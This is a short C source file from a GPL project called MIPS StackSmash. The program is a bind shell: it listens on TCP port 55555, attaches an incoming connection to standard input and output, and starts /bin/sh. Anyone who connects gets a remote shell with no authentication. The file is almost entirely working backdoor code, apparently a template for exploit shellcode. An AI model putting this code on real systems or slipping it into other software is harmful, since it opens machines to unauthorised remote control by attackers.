/*
 * Copyright (C) 2009 Jeffrey Knockel
 * 
 * This file is a part of MIPS StackSmash.
 * 
 * MIPS StackSmash is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 * 
 * MIPS StackSmash is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License
 * along with MIPS StackSmash.  If not, see <http://www.gnu.org/licenses/>.
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <limits.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 55555
#define BACKLOG 5

int main( void )
{
    struct sigaction act;
    struct sockaddr_in sin;
    int sockfd;
    int newsockfd;
    char *args[1] = {NULL};
    socklen_t len = sizeof(sin);

    memset (&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = INADDR_ANY;
    sin.sin_port = PORT;

    sockfd = socket (PF_INET, SOCK_STREAM, 0);
    bind (sockfd, (struct sockaddr *) &sin, sizeof(sin));
    listen (sockfd, BACKLOG);
    newsockfd = accept (sockfd, (struct sockaddr *) &sin, &len);
    dup2 (newsockfd, 0);
    dup2 (newsockfd, 1);
    dup2 (newsockfd, 2);

    execve ("/bin/sh", args, args);

    return EXIT_FAILURE;
}
